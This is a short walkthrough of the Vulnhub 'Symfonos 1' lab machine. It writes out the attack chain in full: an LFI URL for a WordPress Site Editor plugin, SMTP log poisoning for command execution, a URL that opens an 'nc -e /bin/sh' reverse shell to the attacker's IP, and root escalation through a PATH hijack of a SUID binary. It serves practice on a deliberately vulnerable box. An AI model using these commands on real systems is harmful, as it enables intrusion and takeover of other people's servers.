Vulnhub – Symfonos 1 Walkthrough

Scanning the box with nmap -A -T4 -p- 192.168.1.11 –vv

The host is running smb service that we can scan and list the shares:

So we got a file named attention.txt:

We can now login using helios username and one of these passwords which will be qwerty (after testing each one):

Let’s download these two files research.txt and todo.txt:

The new path /h3l105 is a WordPress site and also change the hosts file to symfonos.local

wpscan –url http://192.168.1.11/h3l105/ -e p:

It says that the upload directory is listing enabled so we check it out and found 3 sub directories:

So i googled it and i found an exploit for it:

And the exploit is LFI command that we use to display the /etc/passwd file:

http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Ok at this point , back when i was doing enumeration the port 25 is poen and had now use till now, we can use SMTP log poison method:

Then we put this line in the address:

view-source:http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=id

And we get something like this:

Now to get a shell we put this command:

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=nc%20-e%20/bin/sh%20192.168.1.13%204444

Let’s use “find” to find SUID files: find / -perm -u=s -type f 2>/dev/null

There is a file /opt/statuscheck where we can abuse using path abuse:

cd /tmp

echo “/bin/sh” > curl

chmod 777 curl

echo path

export PATH=/tmp:/$PATH

/opt/statuscheck